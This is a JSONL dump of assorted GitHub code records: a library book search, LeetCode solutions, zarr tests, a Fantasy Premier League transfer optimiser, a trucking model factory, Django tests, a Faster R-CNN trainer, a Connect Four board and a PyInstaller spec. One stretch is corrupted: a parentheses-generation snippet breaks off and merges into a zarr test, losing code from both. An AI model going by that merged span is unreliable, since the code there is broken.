Loan'\" or i[3].strip() == '\"Out on Loan\"'):\n found = 0\n #if the user inputs yes the book matches with the book in the database\n # prints that this book is not in stock, if the loan_status is equal to \"In stock\"\n book_by_string.clear()\n book_database.clear()\n break\n \n elif confirm.lower() == \"no\": #if the user says that it was not the right book\n print(\"Try again, please be more precise\")\n book_by_string.remove(item)# the incorrect book is removed from the list so that another book that is similar can be tried\n bookrequest = input(\"Please enter the name of the book you like to find: \")\n booksearch(bookrequest)\n\n else:\n print(\"Try again, please be more precise\")\n bookrequest = input(\"Please enter the name of the book you like to find: \")\n booksearch(bookrequest)# if the input is anything other than yes or no, then user is accessed to reenter their choice\n else:\n break\n \n if found == 1:\n print(\"This book is in stock\")\n elif found == 0:\n print(\"This book is not in stock\")\n \n \n else:\n if found == 3:\n print(\"Sorry this book is not in stock: %s\"%(bookrequest)) #if book title is not found at all then it says the book is not in stock\n Book_found = \"None\"\n \n book_by_string.clear()\n book_database.clear()\n\n \nbook_for_checkout = Book_found\n\nif __name__==\"__main__\":\n # testing search function\n request = [\"harry\",\"harry potter\",\"lord\",\"1\"]\n for i in request:\n booksearch(i)\n # results should be as follows\n # Output 1 = This is in Stock\n # Output 2 = This is in Stock\n # Output 3 = This is in Stock\n # Output 4 = Sorry this book is not in stock: 
1\n","repo_name":"Tobstab/Library-System","sub_path":"booksearch.py","file_name":"booksearch.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22586349594","text":"# !/usr/bin/env python\n# coding: utf-8\n\"\"\"\nAuthor:\n Tian Gao (tgaochn@gmail.com)\nCreationDate:\n Fri, 09/04/2020, 18:21\n# !! Description:\nGiven a set of candidate numbers (candidates) (without duplicates) and a target number (target), find all unique combinations in candidates where the candidate numbers sums to target.\n\nThe same repeated number may be chosen from candidates unlimited number of times.\n\nNote:\n\nAll numbers (including target) will be positive integers.\nThe solution set must not contain duplicate combinations.\nExample 1:\n\nInput: candidates = [2,3,6,7], target = 7,\nA solution set is:\n[\n [7],\n [2,2,3]\n]\nExample 2:\n\nInput: candidates = [2,3,5], target = 8,\nA solution set is:\n[\n  [2,2,2,2],\n  [2,3,3],\n  [3,5]\n]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/combination-sum\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\nimport sys\nsys.path.append('..')\nfrom utils import binaryTree\nfrom utils import singleLinkedList\nfrom utils import nTree\n\nListNode = singleLinkedList.ListNode\nTreeNode = binaryTree.TreeNode\nNode = nTree.Node\nnull = None\n\nclass Solution:\n def combinationSum1(self, candidates: List[int], target: int) -> List[List[int]]:\n \"\"\"\n backtracking\n \"\"\"\n\n rlt = []\n n = len(candidates)\n\n def bt(sol, curTar, i):\n # step 3: pruning\n if curTar < 0:\n return\n\n # step 1: end condition\n if i == n:\n if curTar == 0:\n rlt.append(sol)\n return \n \n # step 2: update answer and next step\n # case1: pick\n # case2: not pick and move to next\n bt(sol + [candidates[i]], curTar - candidates[i], i)\n bt(sol, curTar, i + 1)\n\n bt([], target, 0)\n return rlt\n # endFunc\n# endClass\n\ndef func():\n s = Solution()\n\n # !! change function name and para here\n myFuncLis = [\n s.combinationSum,\n ]\n inputParaLis1 = [\n [2, 3, 6, 7],\n # singleLinkedList.buildSingleList([])\n # binaryTree.buildTree([])\n # nTree.buildTree([])\n ]\n inputParaLis2 = [\n 7,\n ]\n inputParaLis3 = [\n None,\n ]\n # !! ====================================\n\n # ! instances that need an empty line\n specialTypeLis = [TreeNode, Node]\n\n # ! function and parameters count\n inputSetCnt = len(inputParaLis1)\n funcCnt = len(myFuncLis)\n funcParaCnt = 1\n if not inputParaLis3[0] is None:\n funcParaCnt = 3\n elif not inputParaLis2[0] is None:\n funcParaCnt = 2\n\n # ! for each input set\n for i in range(inputSetCnt):\n inputPara1 = inputParaLis1[i]\n para1Splitter = '\\n' if isOneInstance(inputPara1, specialTypeLis) else '\\t'\n inputPara2 = None\n para2Splitter = None\n inputPara3 = None\n para3Splitter = None\n\n # ! start a new line if the parameter is a tree\n if funcParaCnt >= 2:\n inputPara2 = inputParaLis2[i]\n para2Splitter = '\\n' if isOneInstance(inputPara2, specialTypeLis) else '\\t'\n if funcParaCnt >= 3:\n inputPara3 = inputParaLis3[i]\n para3Splitter = '\\n' if isOneInstance(para3Splitter, specialTypeLis) else '\\t'\n\n # ! for each function\n for j in range(funcCnt):\n myFunc = myFuncLis[j]\n print('func: \\t%s' % myFunc.__name__)\n\n # ! 
output parameters\n            if funcParaCnt == 1:\n                print('input1:%s%s' % (para1Splitter, inputPara1))\n                rlt = myFunc(inputPara1)\n            if funcParaCnt == 2:\n                print('input1:%s%s' % (para1Splitter, inputPara1))\n                print('input2:%s%s' % (para2Splitter, inputPara2))\n                rlt = myFunc(inputPara1, inputPara2)\n            if funcParaCnt == 3:\n                print('input1:%s%s' % (para1Splitter, inputPara1))\n                print('input2:%s%s' % (para2Splitter, inputPara2))\n                print('input3:%s%s' % (para3Splitter, inputPara3))\n                rlt = myFunc(inputPara1, inputPara2, inputPara3)\n\n            # ! output result\n            rltSplitter = '\\n' if isinstance(rlt, TreeNode) else '\\t'\n            print('rlt:%s%s' % (rltSplitter, rlt))\n            print('==' * 20)\n# endFunc\n\ndef isOneInstance(myInstance, typeLis):\n    for curType in typeLis:\n        if isinstance(myInstance, curType):\n            return True\n    return False\n# endFunc\n\ndef main():\n    func()\n# endMain\n\n\nif __name__ == \"__main__\":\n    main()\n# endIf\n","repo_name":"tgaochn/leetcode","sub_path":"1. solvedProblems/39. Combination Sum/39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3273362664","text":"\nn = 3\n# constraint: l_n <= r_n\nres = []\n# use backtracking\ndef dfs(n,path,res,l_n,r_n):\n    if len(path) == 2*n:\n        res.append(path)\n    if l_n>r_n: # if there are more open brackets than close brackets, add a close bracket\n        new_path = path+')'\n        dfs(n, new_path, res,l_n,r_n+1)\n    if l_n None:\n    runner = CliRunner()\n    with runner.isolated_filesystem():\n        os.mkdir(\"empty.zarr\")\n        r = runner.invoke(digest, [\"--digest\", \"zarr-checksum\", \"empty.zarr\"])\n        assert r.exit_code == 0\n        assert r.output == \"empty.zarr: 481a2f77ab786a0f45aafd5db0971caa-0--0\\n\"\n\n\ndef test_digest_zarr_with_excluded_dotfiles():\n    # This test assumes that the Zarr serialization format never changes\n    runner = CliRunner()\n    with runner.isolated_filesystem():\n        dt = np.dtype(\" 3:\n            return False\n    else:\n        return True\n\ndef teamSelector(teamlist, n_weeks):\n\n    col_headings = ['GW+{}'.format(i+1) for i in range(0, n_weeks)]\n\n    formations = [[3, 4, 3], [3, 5, 2], [4, 3, 3], [4, 4, 2], [4, 5, 1], [5, 3, 2], [5, 4, 1]]\n\n    # - Find all players for next n_weeks\n    team_inds = np.zeros(11, dtype=int)\n    current_inds = np.zeros(11, dtype=int)\n\n    teamselection = pd.DataFrame(np.zeros((15, len(col_headings)+2)), columns=['id', 'name'] + col_headings)\n    teamselection[['id', 'name']] = teamlist[['id', 'name']]\n    teamselection[col_headings] = False\n\n    for col_name in col_headings:\n\n        X = teamlist[['id', 'position', col_name]].sort_values(by=['position', col_name], ascending=[True, False])\n\n        current_inds[0] = X.index[0]\n\n        points = 0\n        for formation in formations:\n            t = 1\n            for pos, n_pos in enumerate(formation):\n\n                t, s = t+n_pos, t\n                current_inds[s:t] = X.loc[X['position']==pos+2, col_name].index[:n_pos].values\n\n            if X.loc[current_inds, col_name].sum() > points:\n                points = X.loc[current_inds, col_name].sum()\n                team_inds = current_inds.copy()\n\n        teamselection.loc[team_inds, col_name] = True\n\n    return teamselection\n\ndef teamReturn(teamlist, n_weeks, weighting=0.8):\n\n    col_headings = ['GW+{}'.format(i+1) for i in range(0, n_weeks)]\n\n    formations = [[3, 4, 3], [3, 5, 2], [4, 3, 3], [4, 4, 2], [4, 5, 1], [5, 3, 2], [5, 4, 1]]\n\n    # - Find all players for next n_weeks\n    current_inds = np.zeros(11, dtype=int)\n\n    tot_points = 0\n    for k, col_name in enumerate(col_headings):\n\n        X = teamlist[['id', 'position', col_name]].sort_values(by=['position', col_name], ascending=[True, False])\n\n        
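        # X is sorted by position first and by predicted points for this gameweek
        # (descending) second, so X.index[0] below is the top-scoring goalkeeper;
        # each candidate formation then fills the defender/midfielder/forward
        # slots from the remaining top-ranked rows and the best total is kept.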
current_inds[0] = X.index[0]\n\n points = 0\n for formation in formations:\n t = 1\n for pos, n_pos in enumerate(formation):\n\n t, s = t+n_pos, t\n current_inds[s:t] = X.loc[X['position']==pos+2, col_name].index[:n_pos].values\n\n if X.loc[current_inds, col_name].sum() > points:\n points = X.loc[current_inds, col_name].sum()\n\n tot_points += (weighting**k)*points\n\n return tot_points\n\n\ndef Transfer(pred, team):\n\n if not isinstance(team, fpl.CurrentTeam):\n raise TypeError('Please supply a pyfpl.CurrentTeam object')\n\n balance = team.transfers.loc[0, 'bank']\n\n teamlist = team.essential\n teamlist = teamlist.merge(pred)\n\n # - remove current players from pred\n inds = pred[pred['id'].isin(teamlist['id'])].index\n pred = pred.drop(inds)\n\n W = teamlist.loc\n print(pred.shape)\n\n return teamlist, inds\n\n\nmyteam = fpl.CurrentTeam(retrieve.user_team('chris'))\n\ncgw = retrieve.current_gw()\nn_weeks = 6\n\nbalance = myteam.transfers.loc[0, 'bank']\n\nplist = retrieve.player_list(gw=cgw)\n\n\ndf = datasets.gameweekPrediction()\n\ndf = df[df['GW']<(cgw+n_weeks+1)]\npredictions = df.pivot(index='id', columns='GW', values='predicted_points_scored').reset_index()\n\n\ncols_needed = ['id', 'team', 'element_type', 'now_cost', 'web_name']\npredictions = predictions.merge(plist[cols_needed], on='id', how='left')\npredictions = predictions.rename(columns={'team': 'clubid',\n 'element_type': 'position',\n 'now_cost': 'value',\n 'web_name': 'name'})\n\nr = np.arange(cgw+1, cgw+n_weeks+1, dtype=int)\nGW_cols = ['GW+{}'.format(i+1) for i in range(0,n_weeks)]\npredictions = predictions.rename(columns=dict(zip(r,GW_cols)))\n\nteaminfo = myteam.essential\nteaminfo = teaminfo.merge(predictions[['id', 'name'] + GW_cols], on='id', how='left')\nteaminfo = teaminfo.rename(columns={'selling_price': 'value'})\nteaminfo = teaminfo.sort_values(by='position').reset_index(drop=True)\npredictions = predictions[teaminfo.columns]\n\npredictions.to_csv('prediction.csv')\n\ndrop_inds = predictions[predictions['position'].isna()].index\npredictions = predictions.drop(drop_inds)\npredictions[['clubid', 'position', 'value']] = predictions[['clubid', 'position', 'value']].astype(int)\n\n\n\nteam_ids = teaminfo['id'].values\ninds = predictions[predictions['id'].isin(team_ids)].index\npredictions = predictions.drop(inds)\n\npredictions['tot_return'] = predictions[GW_cols].sum(axis=1)\ndrop_inds = predictions[predictions['tot_return']<3].index\npredictions = predictions.drop(drop_inds)\npredictions = predictions.reset_index(drop=True)\n\n\nmax_prices = np.array([teaminfo.loc[teaminfo['position']==i,'value'].max() for i in range(1,5)]) + balance\n\n# - eliminate those players too expensive\nfor i, price in enumerate(max_prices):\n\n records = (predictions['position']==(i+1)) & (predictions['value']>price)\n inds = predictions[records].index\n if len(inds)>0:\n predictions = predictions.drop(inds)\n\nposition_locs = [[0,1], [2,3,4,5,6], [7,8,9,10,11], [12,13,14]]\n\ncurrent_return = teamReturn(teaminfo, n_weeks=6, weighting=0.5)\nteamselection = teamSelector(teaminfo, n_weeks=6)\n\nN = predictions.shape[0]\n\ntransfers = pd.DataFrame([], columns=['player_out', 'player_in', 'player_cost', 'transfer_cost', 'points_gain'])\n\n# for t, ind in enumerate(predictions.index):\n#\n# # - swap players and check price is ok\n# pos, val = predictions.loc[ind, ['position','value']]\n#\n# # - Check value\n# if val <= teaminfo.loc[j, 'value'] + balance:\n#\n# # - swap in player and check\n# teaminfo.loc[j], temp = predictions.loc[ind], 
teaminfo.loc[j].copy()\n#\n# # - Check for clubs\n# if teamCheck(teaminfo):\n# tot_points = teamReturn(teaminfo, n_weeks=6, weighting=0.5)\n# if tot_points>current_return:\n# print('{} -> {} [{:.1f}]'.format(temp['name'], teaminfo.loc[j,'name'], tot_points))\n#\n# transfers.loc[transfers.shape[0]] = [teaminfo.loc[j,'id'], teaminfo.loc[j,'name'], teaminfo.loc[j,'value'], tot_points]\n#\n# teaminfo.loc[j] = temp\n#\n# print('{:.1f}% - complete'.format(100*(t+1)/N))\n#\n# transfers.to_csv('possible_transfers.csv', index=False)\n\npredictions = predictions.reset_index(drop=True)\n\nfor ind in predictions.index:\n\n # - swap players and check price is ok\n pos, val_in = predictions.loc[ind, ['position','value']]\n\n for j in position_locs[pos-1]:\n\n val_out = teaminfo.loc[j, 'value']\n # - Check value\n if val_in <= val_out + balance:\n\n # - swap in player and check\n teaminfo.loc[j], temp = predictions.loc[ind], teaminfo.loc[j].copy()\n\n if teamCheck(teaminfo):\n\n alt_return = teamReturn(teaminfo, n_weeks=6, weighting=0.5)\n if alt_return>current_return+0.5:\n transfers.loc[transfers.shape[0]] = [temp['name'], teaminfo.loc[j, 'name'],\n val_in, val_in-val_out, alt_return-current_return]\n print('{} -> {} [{:.1f}]'.format(temp['name'], teaminfo.loc[j,'name'], alt_return-current_return))\n teaminfo.loc[j] = temp\n\n print('{:.1f}% - complete'.format(100*ind/N))\n\ntransfers.to_csv('transfers.csv',index=False)\nteaminfo.to_csv('teaminfo.csv', index=False)\nteamselection.to_csv('selection.csv', index=False)\n\n\ntot_return = teamReturn(teaminfo, 6, 0.6)\n\n","repo_name":"cjoyneruk/pyfpl","sub_path":"other_files/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23570529012","text":"import random\nfrom trucking.model import *\n\nclass ProblemFactory(object):\n \"\"\"Factory class for creation of Problem instances.\n \"\"\" \n \n def createProblemMasterData(self, spokeByName):\n \"\"\"This creates a problem with its master data.\n \n This problem is used as the initial model for the samples.\n \"\"\"\n pb = Problem()\n\n A = Spoke(\"A\", 360, 1080)\n B = Spoke(\"B\", 400, 1150)\n C = Spoke(\"C\", 380, 1200)\n D = Spoke(\"D\", 340, 900)\n E = Spoke(\"E\", 420, 800)\n F = Spoke(\"F\", 370, 1070)\n\n spokes = [A, B, C, D, E, F]\n for s in spokes:\n spokeByName[s.name] = s\n pb.spokes.extend(spokes)\n \n G = Hub(\"G\")\n H = Hub(\"H\")\n \n hubs = [G, H]\n pb.hubs.extend(hubs)\n\n SmallTruck = TruckType(\"SmallTruck\", 400, 10, 55)\n BigTruck = TruckType(\"BigTruck\", 700, 15, 45)\n\n truckTypes = [SmallTruck, BigTruck]\n pb.truckTypes.extend(truckTypes)\n\n loadTimes = [LoadTime(G, SmallTruck, 30),\n LoadTime(G, BigTruck, 55), \n LoadTime(H, SmallTruck, 35),\n LoadTime(H, BigTruck, 50)]\n pb.loadTimes.extend(loadTimes)\n\n routes = [\n Route(A, G, 200),\n Route(A, H, 50),\n Route(B, G, 120),\n Route(B, H, 100),\n Route(C, H, 110),\n Route(D, G, 70),\n Route(D, H, 100),\n Route(E, G, 120),\n Route(E, H, 100),\n Route(F, H, 105)\n ]\n pb.routes = routes\n return pb\n \n \n def createSampleProblem(self):\n \"\"\"This creates a problem with the default master data and a sample\n shipment set.\n \"\"\"\n spokeByName = {}\n pb = self.createProblemMasterData(spokeByName)\n\n A = spokeByName[\"A\"]\n B = spokeByName[\"B\"]\n C = spokeByName[\"C\"]\n D = spokeByName[\"D\"]\n E = spokeByName[\"E\"]\n F = spokeByName[\"F\"]\n\n shipments = [\n Shipment(A, B, 300),\n 
Shipment(A, C, 250),\n            Shipment(A, D, 350),\n            Shipment(A, E, 145),\n            Shipment(A, F, 300),\n            Shipment(B, A, 185),\n            Shipment(B, C, 200),\n            Shipment(B, D, 221),\n            Shipment(B, E, 263),\n            Shipment(B, F, 197),\n            Shipment(C, A, 143),\n            Shipment(C, B, 178),\n            Shipment(C, D, 258),\n            Shipment(C, E, 221),\n            Shipment(C, F, 106),\n            Shipment(D, A, 75),\n            Shipment(D, B, 135),\n            Shipment(D, C, 245),\n            Shipment(D, E, 283),\n            Shipment(D, F, 155),\n            Shipment(E, A, 123),\n            Shipment(E, B, 234),\n            Shipment(E, C, 143),\n            Shipment(E, D, 78),\n            Shipment(E, F, 107),\n            Shipment(F, A, 201),\n            Shipment(F, B, 157),\n            Shipment(F, C, 169),\n            Shipment(F, D, 212),\n            Shipment(F, E, 104),\n        ]\n        pb.shipments.extend(shipments)\n        return pb\n    \n    \n    def createProblemWithRandomShipments(self, seed, mean_qty, standard_deviation):\n        \"\"\"Returns a ``Problem`` instance using a fixed logistic network but\n        with randomly generated ``Shipment`` orders.\n        \n        \n        Args:\n            seed: Seed for random value generator\n            mean_qty: Mean value for generating ``Shipment`` quantities\n            standard_deviation: Standard deviation value for generating \n                ``Shipment`` quantities\n        Returns:\n            The generated ``Problem`` instance\n        \"\"\"\n        random.seed(seed)\n        spokeByName = {}\n        pb = self.createProblemMasterData(spokeByName)\n        MIN_QTY = 50\n        for source in spokeByName.values():\n            for destination in spokeByName.values(): \n                if (source != destination): \n                    quantity = (int)(random.gauss(0,1) *\n                                     standard_deviation + mean_qty)\n                    quantity = MIN_QTY if quantity < MIN_QTY else quantity\n                    pb.shipments.append(Shipment(source, destination, quantity))\n        return pb\n","repo_name":"IBMDecisionOptimization/DOcloud-Python-client-samples","sub_path":"examples/trucking/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"22283918228","text":"from django.test import TestCase, Client\nfrom .models import *\nfrom django.urls import reverse\n\ndef create_booking(album, contact):\n\n    return Booking.objects.create(album=album, contact=contact)\n\n\nclass AlbumModelTests(TestCase):\n\n    \n    def test_album_is_available(self):\n        album = Album(title=\"Test Album\")\n\n        self.assertIs(album.available,True)\n\nclass DetailPageTests(TestCase):\n\n    def setUp(self):\n\n        new_album = Album.objects.create(title=\"New album\")\n\n        self.album =Album.objects.get(title=\"New album\")\n\n\n\n    def test_detail_page_returns_200(self):\n\n        url = reverse('store:detail',args=(self.album.id,))\n\n        response = self.client.get(url)\n\n        self.assertEqual(response.status_code,200)\n\n    def test_detail_page_returns_404(self):\n\n        url = reverse('store:detail',args=(self.album.id+1,))\n\n        response = self.client.get(url)\n\n        self.assertEqual(response.status_code,404)\n\n\nclass BookingPageTests(TestCase):\n\n    def setUp(self):\n\n        Contact.objects.create(name=\"Mac Gayver\", email=\"macgayver@gmail.com\")\n\n        self.contact = Contact.objects.get(email=\"macgayver@gmail.com\")\n\n        Artist.objects.create(name=\"Alan Walker\")\n\n        self.artist = Artist.objects.get(name=\"Alan Walker\")\n\n        Album.objects.create(title=\"Different World\")\n\n        self.album = Album.objects.get(title=\"Different World\")\n\n        self.artist.albums.add(self.album)\n\n        self.album.artists.add(self.artist)\n\n    def test_booking_is_registred(self):\n\n        old_bookings = Booking.objects.count()\n\n        self.client.post(reverse('store:detail',args=(self.album.id,)),\n\n        {\n            'name':self.contact.name,\n            'email':self.contact.email,\n\n        }\n        \n        
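        # the dict above is the form payload: posting a valid name and email to
        # the detail view should register exactly one new Booking for this album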
)\n\n self.assertEqual(Booking.objects.count()-1,old_bookings)\n\n def test_booking_is_not_registred(self):\n\n old_bookings = Booking.objects.count()\n\n self.album.available = False\n\n self.album.save()\n\n self.client.post(reverse('store:detail',args=(self.album.id,)),\n\n {\n 'name':self.contact.name,\n 'email':self.contact.email,\n\n }\n \n )\n\n self.assertEqual(Booking.objects.count(),old_bookings)\n\n\n\n\n\n\n\n\n\n\n# Create your tests here.\n","repo_name":"SamirMaoude/samdisk","sub_path":"store/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7195791545","text":"\"\"\"\n@file rcnn.py\n@author Chang Yan (cyan13@jhu.edu)\n\"\"\"\n\nimport torchvision\nimport torch\nimport os, time\nimport torch.optim as optim\nimport numpy as np\nfrom logger import Logger\nfrom torch import nn\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\n \nclass Rcnn:\n \n def __init__(self, path, name, num_epochs, batch, pre=True):\n self.model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=pre)\n num_classes = 2\n in_features = self.model.roi_heads.box_predictor.cls_score.in_features\n self.model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n self.path = os.path.join(path, name)\n self.device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n #self.device = torch.device(\"cpu\")\n self.model.to(self.device)\n self.model.float()\n params = [p for p in self.model.parameters() if p.requires_grad]\n self.optimizer = optim.SGD(params, lr=0.005, momentum=0.9, weight_decay=0.0005)\n self.cur_epoch = 0\n self.epochs = num_epochs\n self.loss = np.infty\n self.best_loss = np.infty\n self.start_time = int(time.time())\n self.freq_for_save = 5\n self.batch = batch\n \n def train_val(self, Xtrain, Ytrain, Xval, Yval):\n \"\"\"\n This function handles both train and validation.\n \"\"\"\n val_history = []\n train_history = []\n\n Logger.log(\"will start training\")\n \n for epoch in range(self.cur_epoch, self.epochs):\n self.cur_epoch = epoch\n train_history.append(self.train(Xtrain, Ytrain))\n Logger.log(f\"train loss {train_history[-1]:.8f}\")\n \n if not epoch % (self.freq_for_save):\n val_history.append(self.val(Xval, Yval))\n Logger.log(f\"{epoch} epoch - val loss {val_history[-1]:.8f}\")\n self.loss = val_history[-1]\n if epoch >= 25 and np.sum(val_history[-2:]) > np.sum(val_history[-4:-2]):\n Logger.log(\"early stop\")\n Logger.log(f\"train history {train_history}\")\n Logger.log(f\"validation history {val_history}\")\n \n break\n\n if not (epoch % (self.freq_for_save)) or self.best_loss > self.loss:\n Logger.log(\"saving\")\n self.save()\n Logger.log(f\"{self.cur_epoch} epoch loss {self.loss:.8f} best loss {self.best_loss:.8f}\")\n \n def train(self, images, boxes):\n self.model.train()\n labels = torch.ones((len(images), 1), dtype = torch.int64).to(self.device)\n boxes = torch.from_numpy(boxes.reshape((boxes.shape[0], 1, 4))).float().to(self.device)\n images = list(torch.from_numpy(image).float().to(self.device) for image in images)\n targets = []\n for i in range(len(images)):\n d = {}\n d['boxes'] = boxes[i]\n d['labels'] = labels[i]\n targets.append(d)\n \n history = []\n size = int(len(images) / self.batch)\n for i in range(self.batch):\n self.optimizer.zero_grad()\n X = images[i*size: (i+1)*size]\n Y = targets[i*size: (i+1)*size]\n output = self.model(X, Y)\n losses = sum(loss for loss 
in output.values())\n losses.backward()\n self.optimizer.step()\n history.append(float(losses))\n \n return np.sum(np.array(history)) / self.batch\n \n def predict(self, images):\n images = list(torch.from_numpy(image).float().to(self.device) for image in images)\n self.model.eval()\n predictions = self.model(images)\n print(predictions)\n boxes = []\n scores = []\n for case in predictions:\n best_i = -1\n best_scores = torch.zeros(1).to(self.device)\n for i in range(case['scores'].shape[0]):\n if case['labels'][i] == 1 and case['scores'][i] >= best_scores:\n best_scores = case['scores'][i]\n best_i = i\n if best_i != -1:\n boxes.append(case['boxes'][best_i].detach().cpu().numpy())\n scores.append(best_scores.detach().cpu().numpy())\n else:\n boxes.append(np.array([0, 0, 0, 0]))\n scores.append(0)\n return boxes, scores\n \n def val(self, images, boxes):\n \"\"\"\n This function validates one epoch of the model.\n \"\"\"\n self.model.train()\n\n with torch.no_grad():\n labels = torch.ones((len(images), 1), dtype = torch.int64).to(self.device)\n boxes = torch.from_numpy(boxes.reshape((boxes.shape[0], 1, 4))).float().to(self.device)\n images = list(torch.from_numpy(image).float().to(self.device) for image in images)\n targets = []\n for i in range(len(images)):\n d = {}\n d['boxes'] = boxes[i]\n d['labels'] = labels[i]\n targets.append(d)\n \n history = []\n size = int(len(images) / self.batch)\n for i in range(self.batch):\n self.optimizer.zero_grad()\n X = images[i*size: (i+1)*size]\n Y = targets[i*size: (i+1)*size]\n output = self.model(X, Y)\n losses = sum(loss for loss in output.values())\n history.append(float(losses))\n \n return np.sum(np.array(history)) / self.batch\n \n def save(self):\n if self.best_loss > self.loss:\n self.best_loss = self.loss\n torch.save(self.model.state_dict(), self.path)\n \n def load(self):\n self.model.load_state_dict(torch.load(self.path, map_location = \"cpu\"))\n self.model.eval()\n ","repo_name":"Evenstarneko/Machine-learning","sub_path":"Final Project/rcnn.py","file_name":"rcnn.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23230558866","text":"from itertools import permutations\n\ndef isPrime(num):\n if num <= 1:\n return False\n if num == 2:\n return True\n for i in range(2, num):\n if num % i == 0:\n return False\n return True\n \n \ndef solution(numbers):\n primes = set()\n for idx in range(1, len(numbers)+1):\n pers = list(map(int, map(''.join, list(permutations(numbers, idx)))))\n print(pers)\n for per in pers:\n if isPrime(per):\n primes.add(per)\n answer = len(primes)\n return answer","repo_name":"OTKRyu/algorithm_problem_solving","sub_path":"brute_force/programmers_42839.py","file_name":"programmers_42839.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12914957504","text":"\nclass Board:\n\n def __init__(self, n_rows, n_cols):\n m = []\n for i in range(n_rows):\n l = [0 for _ in range(n_cols)]\n m.append(l)\n self.field = m\n self.game_ended = False\n self.cols = n_cols\n self.rows = n_rows\n self.height = [0 for _ in range(n_cols)]\n self.last_mover = -1\n self.last_col = -1\n\n def move_legal(self, col):\n if col >= self.cols:\n raise ValueError(\"Column is out of bounds1\")\n if self.field[self.rows-1][col] != 0:\n return False\n return True\n\n def move(self, col, player):\n if not self.move_legal(col):\n return False\n 
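        # drop the piece into this column at its current fill height, then raise
        # the column height and remember who moved last and in which column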
self.field[self.height[col]][col] = player\n        self.height[col] += 1\n        self.last_mover = player\n        self.last_col = col\n        return True\n\n    def undo_move(self, col):\n        if col >= self.cols:\n            raise ValueError(\"Column is out of bounds2\")\n        if self.height[col] == 0:\n            return False\n        self.field[self.height[col]-1][col] = 0\n        self.height[col] -= 1\n        return True\n\n    def game_end(self, last_col):\n        if last_col >= self.cols:\n            raise ValueError(\"Column is out of bound3\")\n        col = last_col\n        row = self.height[last_col] - 1\n        if row < 0:\n            return False, -1\n        player = self.field[row][col]\n\n        # vertical\n        seq = 1\n        r = row - 1\n        while r >= 0 and self.field[r][col] == player:\n            seq += 1\n            r -= 1\n        if seq > 3:\n            return True, player\n\n        # horizontal\n        seq = 0\n        c = col\n        while (c-1) >= 0 and self.field[row][c-1] == player:\n            c -= 1\n        while c < self.cols and self.field[row][c] == player:\n            seq += 1\n            c += 1\n        if seq > 3:\n            return True, player\n\n        # diagonal, left to right\n        seq = 0\n        r = row\n        c = col\n        while (c-1) >= 0 and (r-1) >= 0 and self.field[r-1][c-1] == player:\n            c -= 1\n            r -= 1\n        while c < self.cols and r < self.rows and self.field[r][c] == player:\n            c += 1\n            r += 1\n            seq += 1\n        if seq > 3:\n            return True, player\n\n        # diagonal, right to left\n        seq = 0\n        r = row\n        c = col\n        while (c-1) >= 0 and (r+1) < self.rows and self.field[r+1][c-1] == player:\n            c -= 1\n            r += 1\n        while c < self.cols and r >= 0 and self.field[r][c] == player:\n            c += 1\n            r -= 1\n            seq += 1\n        if seq > 3:\n            return True, player\n        return False, -1\n\n    def __str__(self):\n        s = \"\"\n        for i in range(self.rows-1, -1, -1):\n            s += \"\\n\"\n            for j in range(self.cols):\n                s += str(self.field[i][j])\n                s += \" \"\n        return s\n\n\n\n\n","repo_name":"zvonimir-rezo/parallel-programming","sub_path":"lab2/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11822656223","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\nfrom site import getsitepackages\n\ninclude_files = [\n    ('./README.md', '.'),\n    ('license.txt', '.'),\n    ('*.cfg.default', '.'),\n    ('version', '.'),\n    ('art', 'art'),\n    ('charsets', 'charsets'),\n    ('palettes', 'palettes'),\n    ('artscripts', 'artscripts'),\n    ('formats', 'formats'),\n    ('shaders', 'shaders'),\n    ('games', 'games'),\n    ('ui/*.png', 'ui'),\n    ('docs/html/*.*', 'docs/html'),\n    ('docs/html/generated/pdoc_toc.html', 'docs/html/generated'),\n    # pyinstaller doesn't include pdoc templates\n    (getsitepackages()[0] + '/pdoc/templates/*.mako', 'pdoc/templates')\n]\n\ninclude_bins = [\n    ('/usr/local/Cellar/sdl2/2.0.10/lib/libSDL2-2.0.0.dylib', '.'),\n    ('/usr/local/Cellar/sdl2_mixer/2.0.4/lib/libSDL2_mixer-2.0.0.dylib', '.'),\n    ('/usr/local/Cellar/flac/1.3.3/lib/libFLAC.8.dylib', '.'),\n    ('/usr/local/Cellar/libmikmod/3.3.11.1/lib/libmikmod.3.dylib', '.'),\n    ('/usr/local/Cellar/libmodplug/0.8.9.0/lib/libmodplug.1.dylib', '.'),\n    ('/usr/local/Cellar/libogg/1.3.4/lib/libogg.0.dylib', '.'),\n    ('/usr/local/Cellar/libvorbis/1.3.6/lib/libvorbis.0.dylib', '.'),\n    ('/usr/local/Cellar/libvorbis/1.3.6/lib/libvorbisfile.3.dylib', '.'),\n    ('/usr/local/Cellar/smpeg2/2.0.0/lib/libsmpeg2-2.0.0.dylib', '.')\n]\n\na = 